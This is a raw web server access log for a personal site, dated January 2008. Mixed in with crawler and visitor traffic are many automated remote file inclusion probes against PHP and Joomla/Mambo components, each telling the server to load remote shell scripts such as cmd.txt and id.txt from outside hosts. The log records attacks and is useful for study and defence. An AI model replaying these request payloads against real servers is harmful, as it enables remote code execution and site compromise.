85.25.149.191 - - [16/Jan/2008:18:11:16 -0800] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://64.40.146.64/shelltest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
85.25.149.191 - - [16/Jan/2008:18:11:16 -0800] "GET //include/main.php?config[search_disp]=true&include_dir=http://64.40.146.64/shelltest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
70.86.159.26 - - [16/Jan/2008:18:11:34 -0800] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:18:15:57 -0800] "GET /logs/access_071228.log/myevent.php?myevent_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:18:15:57 -0800] "GET /myevent.php?myevent_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:18:15:57 -0800] "GET /logs/myevent.php?myevent_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.19.200 - - [16/Jan/2008:18:16:54 -0800] "GET / HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.98.162.52 - - [16/Jan/2008:18:18:05 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.162.52 - - [16/Jan/2008:18:18:05 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.162.52 - - [16/Jan/2008:18:18:06 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.189.4.131 - - [16/Jan/2008:18:22:22 -0800] "GET /1000http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.10 - - [16/Jan/2008:18:24:20 -0800] "GET /minamijewelry/ HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.117.17.226 - - [16/Jan/2008:18:24:24 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
87.117.17.226 - - [16/Jan/2008:18:24:24 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
64.34.145.199 - - [16/Jan/2008:18:24:30 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
64.34.145.199 - - [16/Jan/2008:18:24:30 -0800] "GET /bikes/dteel/ HTTP/1.0" 200 8385 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
87.117.17.226 - - [16/Jan/2008:18:24:47 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.87.230.170 - - [16/Jan/2008:18:24:51 -0800] "GET /logs/access_071225.log/index.php?body=http://barza.us/images/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.87.230.170 - - [16/Jan/2008:18:25:00 -0800] "GET /index.php?body=http://barza.us/images/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.87.230.170 - - [16/Jan/2008:18:25:05 -0800] "GET /logs/index.php?body=http://barza.us/images/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.29.32 - - [16/Jan/2008:18:26:29 -0800] "GET /?N=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:18:28:56 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:18:28:56 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:18:32:50 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.53.183.183/~mesc/date.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:18:32:50 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.53.183.183/~mesc/date.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:18:32:50 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.53.183.183/~mesc/date.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.28.164 - - [16/Jan/2008:18:34:10 -0800] "GET /minamijewelry/?S=A HTTP/1.0" 200 2100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:18:35:58 -0800] "GET /logs/access_071230.log/myevent.php?myevent_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.189.4.131 - - [16/Jan/2008:18:36:21 -0800] "GET /logs/access_071228.log/1000http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.189.4.131 - - [16/Jan/2008:18:36:21 -0800] "GET /logs/1000http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.27.101 - - [16/Jan/2008:18:37:14 -0800] "GET /retreat1/?S=A HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.160 - - [16/Jan/2008:18:38:51 -0800] "GET /mobileoffice/ HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.113.226.82 - - [16/Jan/2008:18:41:56 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.113.226.82 - - [16/Jan/2008:18:41:57 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.113.226.82 - - [16/Jan/2008:18:41:57 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.113.226.82 - - [16/Jan/2008:18:42:08 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.221 - - [16/Jan/2008:18:42:08 -0800] "GET /mobileoffice/?D=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.7.126 - - [16/Jan/2008:18:48:47 -0800] "GET /logs/access_071116.log HTTP/1.0" 200 80772 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.242.3.251 - - [16/Jan/2008:18:49:42 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.127.70.92 - - [16/Jan/2008:18:49:50 -0800] "GET /logs/access_071229.log/index.php?abs_path=http://h1.ripway.com/tunkzilla007/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.70.92 - - [16/Jan/2008:18:49:56 -0800] "GET /index.php?abs_path=http://h1.ripway.com/tunkzilla007/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.70.92 - - [16/Jan/2008:18:49:57 -0800] "GET /logs/index.php?abs_path=http://h1.ripway.com/tunkzilla007/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.22.134.230 - - [16/Jan/2008:18:51:09 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.22.134.230 - - [16/Jan/2008:18:51:10 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.22.134.230 - - [16/Jan/2008:18:51:11 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.22.134.230 - - [16/Jan/2008:18:51:32 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.2.228.90 - - [16/Jan/2008:18:53:35 -0800] "GET /includes/settings.inc.php?include_path=http://h1.ripway.com/spyd/test.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.2.228.90 - - [16/Jan/2008:18:53:35 -0800] "GET /logs/includes/settings.inc.php?include_path=http://h1.ripway.com/spyd/test.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
74.6.20.144 - - [16/Jan/2008:18:56:51 -0800] "GET /?S=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.155.109.117 - - [16/Jan/2008:19:08:37 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.155.109.117 - - [16/Jan/2008:19:08:38 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.155.109.117 - - [16/Jan/2008:19:08:38 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.155.109.117 - - [16/Jan/2008:19:08:47 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.90 - - [16/Jan/2008:19:10:14 -0800] "GET /!scanhttp://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.179.126.38 - - [16/Jan/2008:19:10:17 -0800] "GET /logs/access_071229.log/components/com_simpleboard/image_upload.php?sbp=http://www.falmeriafs.com//components/spscanid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.179.126.38 - - [16/Jan/2008:19:10:17 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.falmeriafs.com//components/spscanid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.179.126.38 - - [16/Jan/2008:19:10:17 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.falmeriafs.com//components/spscanid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.180.216.105 - - [16/Jan/2008:19:22:50 -0800] "GET / HTTP/1.0" 200 2946 "-" "Nokia6610/1.0 (3.09) Profile/MIDP-1.0 Configuration/CLDC-1.0 (compatible;YahooSeeker/M1A1-R2D2; http://help.yahoo.com/help/us/ysearch/crawling/crawling-01.html)" "www.dmulk.com"
74.6.19.200 - - [16/Jan/2008:19:23:35 -0800] "GET /minamijewelry/source_images/?S=A HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:19:24:18 -0800] "GET /logs/access_071225.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:19:24:18 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:19:24:18 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [16/Jan/2008:19:24:47 -0800] "GET /logs/access_071225.log HTTP/1.1" 200 195051 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
196.22.134.230 - - [16/Jan/2008:19:27:37 -0800] "GET /logs/access_071225.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.22.134.230 - - [16/Jan/2008:19:27:38 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.22.134.230 - - [16/Jan/2008:19:27:39 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.29.7.220 - - [16/Jan/2008:19:36:54 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "holmes/3.12.1 (http://morfeo.centrum.cz/bot)" "www.dmulk.com"
80.87.131.98 - - [16/Jan/2008:19:39:00 -0800] "GET /index.php?option=com_swmenumaker&Itemid=&mosConfig_absolute_path=http://www.umpcdubai.com/mbohya??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
80.87.131.98 - - [16/Jan/2008:19:39:00 -0800] "GET /logs/index.php?option=com_swmenumaker&Itemid=&mosConfig_absolute_path=http://www.umpcdubai.com/mbohya??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
89.111.176.90 - - [16/Jan/2008:19:40:52 -0800] "GET /logs/access_071229.log/!scanhttp://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [16/Jan/2008:19:40:53 -0800] "GET /logs/!scanhttp://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [16/Jan/2008:19:42:54 -0800] "GET /logs/access_071228.log/!scanhttp://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.19.110 - - [16/Jan/2008:19:43:24 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.38 - - [16/Jan/2008:19:43:25 -0800] "GET /tmp/?D=A HTTP/1.0" 200 981 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
71.118.61.153 - - [16/Jan/2008:19:44:00 -0800] "GET /bikes/GPS/WeSTOC2006/ HTTP/1.1" 200 849 "http://www.st-owners.com/forums/showthread.php?t=28267&page=20" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705)" "www.dmulk.com"
71.118.61.153 - - [16/Jan/2008:19:44:04 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705)" "www.dmulk.com"
74.6.29.48 - - [16/Jan/2008:19:46:31 -0800] "GET /tmp/sess_32201013879f0707179f5fbaccbfbc96 HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
24.18.45.238 - - [16/Jan/2008:19:46:32 -0800] "GET /bikes/GPS/WeSTOC2006/ HTTP/1.1" 200 849 "http://www.st-owners.com/forums/showthread.php?p=368123" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
24.18.45.238 - - [16/Jan/2008:19:46:33 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
24.18.45.238 - - [16/Jan/2008:19:47:01 -0800] "GET /bikes/GPS/WeSTOC2006/ HTTP/1.1" 200 849 "http://www.st-owners.com/forums/showthread.php?p=368123" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
24.18.45.238 - - [16/Jan/2008:19:47:02 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
24.18.45.238 - - [16/Jan/2008:19:47:15 -0800] "GET /bikes/ HTTP/1.1" 200 2184 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
24.18.45.238 - - [16/Jan/2008:19:47:34 -0800] "GET /bikes/IMG_1192.jpg HTTP/1.1" 200 3904179 "http://www.dmulk.com/bikes/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
217.113.226.82 - - [16/Jan/2008:19:51:09 -0800] "GET /logs/access_071225.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.113.226.82 - - [16/Jan/2008:19:51:10 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.113.226.82 - - [16/Jan/2008:19:51:11 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.122 - - [16/Jan/2008:19:55:47 -0800] "GET /bikes/dteel/MVI_2430.AVI HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.53.229.194 - - [16/Jan/2008:19:59:52 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
74.53.229.194 - - [16/Jan/2008:19:59:52 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.6.28.233 - - [16/Jan/2008:20:01:19 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.94.35.56 - - [16/Jan/2008:20:01:53 -0800] "GET //becommunity/community/index.php?pageurl=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.229.194 - - [16/Jan/2008:20:04:40 -0800] "GET /manager/admin/u_ins.php?MGR=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
74.53.229.194 - - [16/Jan/2008:20:04:40 -0800] "GET /logs/manager/admin/u_ins.php?MGR=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
74.53.229.194 - - [16/Jan/2008:20:04:53 -0800] "GET /manager/admin/p_ins.php?MGR=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
74.53.229.194 - - [16/Jan/2008:20:04:54 -0800] "GET /logs/manager/admin/p_ins.php?MGR=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
212.85.12.121 - - [16/Jan/2008:20:07:48 -0800] "GET //////////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.73 - - [16/Jan/2008:20:08:54 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.35 - - [16/Jan/2008:20:09:54 -0800] "GET /bikes/dteel/?N=D HTTP/1.0" 200 8385 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:20:10:39 -0800] "GET /logs/access_071225.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:20:10:39 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:20:10:40 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.181.4.175 - - [16/Jan/2008:20:12:17 -0800] "GET /logs//////////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.181.4.175 - - [16/Jan/2008:20:12:17 -0800] "GET //////////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.181.4.175 - - [16/Jan/2008:20:12:17 -0800] "GET /logs//////////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.181.4.175 - - [16/Jan/2008:20:12:17 -0800] "GET //////////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.85.12.121 - - [16/Jan/2008:20:14:35 -0800] "GET /logs//////////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.85.12.121 - - [16/Jan/2008:20:14:36 -0800] "GET //////////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.85.12.121 - - [16/Jan/2008:20:14:38 -0800] "GET /logs/access_071203.log//////////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [16/Jan/2008:20:14:38 -0800] "GET /logs//////////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
